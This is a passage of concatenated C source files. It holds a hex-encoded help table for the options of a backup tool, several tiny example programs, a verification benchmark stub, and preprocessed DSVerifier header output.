0x64, 0x65, 0x70, 0x65, 0x6E, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x65, 0x70,
0x6F, 0x2D, 0x61, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x6B, 0x65, 0x79, 0x2D, 0x74, 0x79, 0x70, 0x65, 0x20, 0x6F, 0x70, 0x74,
0x69, 0x6F, 0x6E, 0x2E,
// repo-azure-key-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x1A, // Summary
0x41, 0x7A, 0x75, 0x72, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x6B, 0x65, 0x79,
0x20, 0x74, 0x79, 0x70, 0x65, 0x2E,
0x78, 0x6B, // Description
0x54, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x6C, 0x6C, 0x6F, 0x77, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x79, 0x70, 0x65, 0x73, 0x20,
0x61, 0x72, 0x65, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x61, 0x75,
0x74, 0x68, 0x6F, 0x72, 0x69, 0x7A, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x3A, 0x0A, 0x0A,
0x2A, 0x20, 0x73, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x2D, 0x20, 0x53, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x6B, 0x65,
0x79, 0x0A,
0x2A, 0x20, 0x73, 0x61, 0x73, 0x20, 0x2D, 0x20, 0x53, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x61, 0x63, 0x63, 0x65, 0x73,
0x73, 0x20, 0x73, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72, 0x65,
// repo-cipher-pass option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x1D, // Summary
0x52, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x63, 0x69, 0x70, 0x68, 0x65, 0x72, 0x20, 0x70, 0x61,
0x73, 0x73, 0x70, 0x68, 0x72, 0x61, 0x73, 0x65, 0x2E,
0x78, 0x3B, // Description
0x50, 0x61, 0x73, 0x73, 0x70, 0x68, 0x72, 0x61, 0x73, 0x65, 0x20, 0x75, 0x73, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x65,
0x6E, 0x63, 0x72, 0x79, 0x70, 0x74, 0x2F, 0x64, 0x65, 0x63, 0x72, 0x79, 0x70, 0x74, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73,
0x20, 0x6F, 0x66, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x2E,
// repo-cipher-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x26, // Summary
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0x78, 0x89, 0x02, // Description
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0x20, 0x69, 0x73, 0x20, 0x61, 0x6C, 0x77, 0x61, 0x79, 0x73, 0x20, 0x70, 0x65, 0x72, 0x66, 0x6F, 0x72, 0x6D, 0x65, 0x64,
0x20, 0x63, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x2D, 0x73, 0x69, 0x64, 0x65, 0x20, 0x65, 0x76, 0x65, 0x6E, 0x20, 0x69, 0x66,
0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x74, 0x79, 0x70, 0x65,
0x20, 0x28, 0x65, 0x2E, 0x67, 0x2E, 0x20, 0x53, 0x33, 0x29, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x73, 0x20,
0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x2E,
// repo-gcs-bucket option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x16, // Summary
0x47, 0x43, 0x53, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x62, 0x75, 0x63, 0x6B, 0x65,
0x74, 0x2E,
0x78, 0xFE, 0x01, // Description
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// repo-gcs-endpoint option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x18, // Summary
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0x69, 0x6E, 0x74, 0x2E,
0x78, 0x70, // Description
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// repo-gcs-key option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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0x78, 0x46, // Description
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// repo-gcs-key-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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0x73, 0x2E,
// repo-hardlink option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x31, // Summary
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0x78, 0x99, 0x02, // Description
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0x2E,
0x10, // Deprecated names begin
0x78, 0x08, // hardlink
0x68, 0x61, 0x72, 0x64, 0x6C, 0x69, 0x6E, 0x6B,
0x00, // Deprecated names end
// repo-host option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x30, // Summary
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0x78, 0xC9, 0x01, // Description
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0x10, // Deprecated names begin
0x78, 0x0B, // backup-host
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70, 0x2D, 0x68, 0x6F, 0x73, 0x74,
0x00, // Deprecated names end
0x10, // Command overrides begin
0x52, // Command backup override begin
0x28, // Internal
0x00, // Command backup override end
0x51, // Command expire override begin
0x28, // Internal
0x00, // Command expire override end
0x58, 0x01, // Command stanza-create override begin
0x28, // Internal
0x00, // Command stanza-create override end
0x50, // Command stanza-delete override begin
0x28, // Internal
0x00, // Command stanza-delete override end
0x50, // Command stanza-upgrade override begin
0x28, // Internal
0x00, // Command stanza-upgrade override end
0x00, // Command overrides end
// repo-host-cmd option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x2B, // Summary
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0x73, 0x74, 0x2E,
0x78, 0xB0, 0x01, // Description
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0x10, // Deprecated names begin
0x78, 0x0A, // backup-cmd
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70, 0x2D, 0x63, 0x6D, 0x64,
0x00, // Deprecated names end
// repo-host-config option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x2E, // Summary
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0x20, 0x66, 0x69, 0x6C, 0x65, 0x2E,
0x78, 0xC1, 0x01, // Description
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0x78, 0x0D, // backup-config
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70, 0x2D, 0x63, 0x6F, 0x6E, 0x66, 0x69, 0x67,
0x00, // Deprecated names end
// repo-host-config-include-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
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// repo-host-config-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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// repo-host-port option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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0x78, 0x0F, // backup-ssh-port
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70, 0x2D, 0x73, 0x73, 0x68, 0x2D, 0x70, 0x6F, 0x72, 0x74,
0x00, // Deprecated names end
// repo-host-user option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
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// repo-local option
// -------------------------------------------------------------------------------------------------------------------------
0x29, // Internal
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// repo-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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0x00, // Deprecated names end
// repo-retention-archive-type option
// -------------------------------------------------------------------------------------------------------------------------
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// repo-retention-full option
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// repo-retention-full-type option
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0x7B, 0x0A, // Section
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// repo-s3-bucket option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
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// repo-s3-endpoint option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
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0x78, 0xE2, 0x01, // Description
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0x75, 0x73, 0x65, 0x66, 0x75, 0x6C, 0x2E,
// repo-s3-key option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x19, // Summary
0x53, 0x33, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x61, 0x63, 0x63, 0x65, 0x73, 0x73,
0x20, 0x6B, 0x65, 0x79, 0x2E,
0x78, 0x23, // Description
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// repo-s3-key-secret option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x20, // Summary
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0x20, 0x61, 0x63, 0x63, 0x65, 0x73, 0x73, 0x20, 0x6B, 0x65, 0x79, 0x2E,
0x78, 0x2A, // Description
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0x74, 0x2E,
// repo-s3-key-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x17, // Summary
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0x70, 0x65, 0x2E,
0x78, 0x70, // Description
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0x2A, 0x20, 0x73, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x2D, 0x20, 0x53, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x6B, 0x65,
0x79, 0x73, 0x0A,
0x2A, 0x20, 0x61, 0x75, 0x74, 0x6F, 0x20, 0x2D, 0x20, 0x41, 0x75, 0x74, 0x6F, 0x6D, 0x61, 0x74, 0x69, 0x63, 0x61, 0x6C,
0x6C, 0x79, 0x20, 0x72, 0x65, 0x74, 0x72, 0x69, 0x65, 0x76, 0x65, 0x20, 0x74, 0x65, 0x6D, 0x70, 0x6F, 0x72, 0x61, 0x72,
0x79, 0x20, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6E, 0x74, 0x69, 0x61, 0x6C, 0x73,
// repo-s3-region option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x15, // Summary
0x53, 0x33, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x72, 0x65, 0x67, 0x69, 0x6F, 0x6E,
0x2E,
0x78, 0x2C, // Description
0x54, 0x68, 0x65, 0x20, 0x41, 0x57, 0x53, 0x20, 0x72, 0x65, 0x67, 0x69, 0x6F, 0x6E, 0x20, 0x77, 0x68, 0x65, 0x72, 0x65,
0x20, 0x74, 0x68, 0x65, 0x20, 0x62, 0x75, 0x63, 0x6B, 0x65, 0x74, 0x20, 0x77, 0x61, 0x73, 0x20, 0x63, 0x72, 0x65, 0x61,
0x74, 0x65, 0x64, 0x2E,
// repo-s3-role option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x13, // Summary
0x53, 0x33, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x72, 0x6F, 0x6C, 0x65, 0x2E,
0x78, 0x67, // Description
0x54, 0x68, 0x65, 0x20, 0x41, 0x57, 0x53, 0x20, 0x72, 0x6F, 0x6C, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x20, 0x28, 0x6E,
0x6F, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x75, 0x6C, 0x6C, 0x20, 0x41, 0x52, 0x4E, 0x29, 0x20, 0x75, 0x73, 0x65,
0x64, 0x20, 0x74, 0x6F, 0x20, 0x72, 0x65, 0x74, 0x72, 0x69, 0x65, 0x76, 0x65, 0x20, 0x74, 0x65, 0x6D, 0x70, 0x6F, 0x72,
0x61, 0x72, 0x79, 0x20, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6E, 0x74, 0x69, 0x61, 0x6C, 0x73, 0x20, 0x77, 0x68, 0x65, 0x6E,
0x20, 0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x33, 0x2D, 0x6B, 0x65, 0x79, 0x2D, 0x74, 0x79, 0x70, 0x65, 0x3D, 0x61, 0x75,
0x74, 0x6F, 0x2E,
// repo-s3-token option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x1D, // Summary
0x53, 0x33, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x73, 0x65, 0x63, 0x75, 0x72, 0x69,
0x74, 0x79, 0x20, 0x74, 0x6F, 0x6B, 0x65, 0x6E, 0x2E,
0x78, 0x33, // Description
0x41, 0x57, 0x53, 0x20, 0x73, 0x65, 0x63, 0x75, 0x72, 0x69, 0x74, 0x79, 0x20, 0x74, 0x6F, 0x6B, 0x65, 0x6E, 0x20, 0x75,
0x73, 0x65, 0x64, 0x20, 0x77, 0x69, 0x74, 0x68, 0x20, 0x74, 0x65, 0x6D, 0x70, 0x6F, 0x72, 0x61, 0x72, 0x79, 0x20, 0x63,
0x72, 0x65, 0x64, 0x65, 0x6E, 0x74, 0x69, 0x61, 0x6C, 0x73, 0x2E,
// repo-s3-uri-style option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x0D, // Summary
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0x2E,
// repo-storage-ca-file option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
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0x10, // Deprecated names begin
0x78, 0x12, // repo-azure-ca-file
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0x78, 0x0F, // repo-s3-ca-file
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0x00, // Deprecated names end
// repo-storage-ca-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
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0x78, 0x56, // Description
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0x10, // Deprecated names begin
0x78, 0x12, // repo-azure-ca-path
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x61, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x63, 0x61, 0x2D, 0x70, 0x61, 0x74, 0x68,
0x78, 0x0F, // repo-s3-ca-path
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0x00, // Deprecated names end
// repo-storage-host option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x18, // Summary
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0x6F, 0x73, 0x74, 0x2E,
0x78, 0x67, // Description
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0x10, // Deprecated names begin
0x78, 0x0F, // repo-azure-host
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x61, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x68, 0x6F, 0x73, 0x74,
0x78, 0x0C, // repo-s3-host
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x33, 0x2D, 0x68, 0x6F, 0x73, 0x74,
0x00, // Deprecated names end
// repo-storage-port option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x18, // Summary
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0x6F, 0x72, 0x74, 0x2E,
0x78, 0x5C, // Description
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0x10, // Deprecated names begin
0x78, 0x0F, // repo-azure-port
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x61, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x70, 0x6F, 0x72, 0x74,
0x78, 0x0C, // repo-s3-port
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x33, 0x2D, 0x70, 0x6F, 0x72, 0x74,
0x00, // Deprecated names end
// repo-storage-verify-tls option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
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0x78, 0xDE, 0x01, // Description
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0x64, 0x2E,
0x10, // Deprecated names begin
0x78, 0x15, // repo-azure-verify-tls
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x61, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x76, 0x65, 0x72, 0x69, 0x66, 0x79, 0x2D, 0x74,
0x6C, 0x73,
0x78, 0x12, // repo-s3-verify-ssl
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x33, 0x2D, 0x76, 0x65, 0x72, 0x69, 0x66, 0x79, 0x2D, 0x73, 0x73, 0x6C,
0x78, 0x12, // repo-s3-verify-tls
0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x33, 0x2D, 0x76, 0x65, 0x72, 0x69, 0x66, 0x79, 0x2D, 0x74, 0x6C, 0x73,
0x00, // Deprecated names end
// repo-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x28, // Summary
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0x78, 0xA5, 0x03, // Description
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// resume option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70,
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0x2E,
// sck-block option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
0x78, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x17, // Summary
0x53, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x20, 0x62, 0x6C, 0x6F, 0x63, 0x6B, 0x69, 0x6E, 0x67, 0x20, 0x65, 0x6E, 0x61, 0x62,
0x6C, 0x65, 0x2E,
0x78, 0x26, // Description
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// sck-keep-alive option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x12, // Summary
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0x78, 0x32, // Description
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0x6E, 0x6E, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x2E,
// set option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x54, // Command expire override begin
0x79, 0x15, // Summary
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0x00, // Command expire override end
0x51, // Command info override begin
0x79, 0x15, // Summary
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0x69, 0x65, 0x64, 0x2E,
0x00, // Command info override end
0x55, // Command restore override begin
0x79, 0x16, // Summary
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0x78, 0x7A, // Description
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0x00, // Command restore override end
0x55, // Command verify override begin
0x28, // Internal
0x78, 0x15, // Summary
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0x00, // Command verify override end
0x00, // Command overrides end
// sort option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x59, 0x01, // Command repo-ls override begin
0x79, 0x2B, // Summary
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0x78, 0x6F, // Description
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0x00, // Command repo-ls override end
0x00, // Command overrides end
// spool-path option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x07, // Section
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0x11, // Command overrides begin
0x5C, 0x01, // Command restore override begin
0x28, // Internal
0x00, // Command restore override end
0x00, // Command overrides end
// stanza option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
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// start-fast option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
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0x20, 0x38, 0x2E, 0x34, 0x2E,
// stop-auto option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
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// tablespace-map option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x72, 0x65, 0x73, 0x74, 0x6F, 0x72, 0x65,
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// tablespace-map-all option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x72, 0x65, 0x73, 0x74, 0x6F, 0x72, 0x65,
0x78, 0x35, // Summary
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0x78, 0xDA, 0x03, // Description
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// target option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x5C, 0x01, // Command restore override begin
0x79, 0x10, // Summary
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0x78, 0x3E, // Description
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0x00, // Command restore override end
0x00, // Command overrides end
// target-action option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x5C, 0x01, // Command restore override begin
0x79, 0x2F, // Summary
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0x78, 0xD3, 0x03, // Description
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0x00, // Command restore override end
0x00, // Command overrides end
// target-exclusive option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x5C, 0x01, // Command restore override begin
0x79, 0x30, // Summary
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0x78, 0xD0, 0x02, // Description
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0x00, // Command restore override end
0x00, // Command overrides end
// target-timeline option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x5C, 0x01, // Command restore override begin
0x79, 0x19, // Summary
0x52, 0x65, 0x63, 0x6F, 0x76, 0x65, 0x72, 0x20, 0x61, 0x6C, 0x6F, 0x6E, 0x67, 0x20, 0x61, 0x20, 0x74, 0x69,
0x6D, 0x65, 0x6C, 0x69, 0x6E, 0x65, 0x2E,
0x78, 0x49, // Description
0x53, 0x65, 0x65, 0x20, 0x72, 0x65, 0x63, 0x6F, 0x76, 0x65, 0x72, 0x79, 0x5F, 0x74, 0x61, 0x72, 0x67, 0x65,
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0x2E,
0x00, // Command restore override end
0x00, // Command overrides end
// tcp-keep-alive-count option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x11, // Summary
0x4B, 0x65, 0x65, 0x70, 0x2D, 0x61, 0x6C, 0x69, 0x76, 0x65, 0x20, 0x63, 0x6F, 0x75, 0x6E, 0x74, 0x2E,
0x78, 0xBB, 0x01, // Description
0x53, 0x70, 0x65, 0x63, 0x69, 0x66, 0x69, 0x65, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x6E, 0x75, 0x6D, 0x62, 0x65, 0x72,
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0x54, 0x68, 0x69, 0x73, 0x20, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x69, 0x73, 0x20, 0x61, 0x76, 0x61, 0x69, 0x6C,
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0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x54, 0x43, 0x50, 0x5F, 0x4B, 0x45, 0x45,
0x50, 0x43, 0x4E, 0x54, 0x20, 0x73, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x20, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x2E,
// tcp-keep-alive-idle option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x15, // Summary
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0x2E,
0x78, 0xDB, 0x01, // Description
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// tcp-keep-alive-interval option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x19, // Summary
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0x2E,
// type option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x52, // Command backup override begin
0x79, 0x0C, // Summary
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0x78, 0x98, 0x02, // Description
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0x00, // Command backup override end
0x59, 0x01, // Command restore override begin
0x79, 0x0E, // Summary
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0x78, 0x84, 0x06, // Description
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0x70, 0x2E,
0x00, // Command restore override end
0x00, // Command overrides end
0x00, // Options end
0x00, // Pack end
};
|
the_stack_data/234519181.c | extern double _exp();
double EXP(statlink, x)
int *statlink; double x;
{return(_exp(x));}
|
the_stack_data/151705428.c | #include<stdio.h>
int main(){
printf("Hello ");
printf("world\n");
int a = 1;
// Loops are used to repeat similar part of a code snippet efficiently
// (
// printf("%d\n", a);
// a++;) =---> 100 times
return 0;
} |
the_stack_data/148577681.c | #include <stdio.h>
int main() {
FILE *fp;
char ch;
if((fp = fopen("case1.in", "r"))==NULL)
return 0;
while((ch = fgetc(fp)) != EOF) {
if ('A'<=ch && ch<='Z')
ch = ch + 32;
printf("%c", ch);
}
fclose(fp);
return 0;
}
|
the_stack_data/129256.c | extern int __VERIFIER_nondet_int();
extern void abort(void);
void reach_error(){}
int id(int x) {
if (x==0) return 0;
return id(x-1) + 1;
}
int main(void) {
int input = 25;
int result = id(input);
if (result == 25) {
ERROR: {reach_error();abort();}
}
}
|
the_stack_data/190767582.c | # 1 "benchmarks/ds-01-impl1.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "<command-line>" 2
# 1 "benchmarks/ds-01-impl1.c"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" 1
# 132 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
int X_SIZE_VALUE = 0;
int overflow_mode = 1;
int rounding_mode = 0;
# 155 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
typedef struct {
double a[100];
int a_size;
double b[100];
int b_size;
double sample_time;
double a_uncertainty[100];
double b_uncertainty[100];
} digital_system;
typedef struct {
double A[4][4];
double B[4][4];
double C[4][4];
double D[4][4];
double states[4][4];
double outputs[4][4];
double inputs[4][4];
double K[4][4];
unsigned int nStates;
unsigned int nInputs;
unsigned int nOutputs;
} digital_system_state_space;
typedef struct {
int int_bits;
int frac_bits;
double max;
double min;
int default_realization;
double delta;
int scale;
double max_error;
} implementation;
typedef struct {
int push;
int in;
int sbiw;
int cli;
int out;
int std;
int ldd;
int subi;
int sbci;
int lsl;
int rol;
int add;
int adc;
int adiw;
int rjmp;
int mov;
int sbc;
int ld;
int rcall;
int cp;
int cpc;
int ldi;
int brge;
int pop;
int ret;
int st;
int brlt;
int cpi;
} instructions;
typedef struct {
long clock;
int device;
double cycle;
instructions assembly;
} hardware;
typedef struct{
float Ap, Ar, Ac;
float wp, wc, wr;
int type;
}filter_parameters;
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
# 1 "/usr/include/stdlib.h" 1 3 4
# 25 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 3 4
# 1 "/usr/include/features.h" 1 3 4
# 461 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 1 3 4
# 452 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 453 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 454 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 462 "/usr/include/features.h" 2 3 4
# 485 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h" 1 3 4
# 11 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 2 3 4
# 486 "/usr/include/features.h" 2 3 4
# 34 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 2 3 4
# 26 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
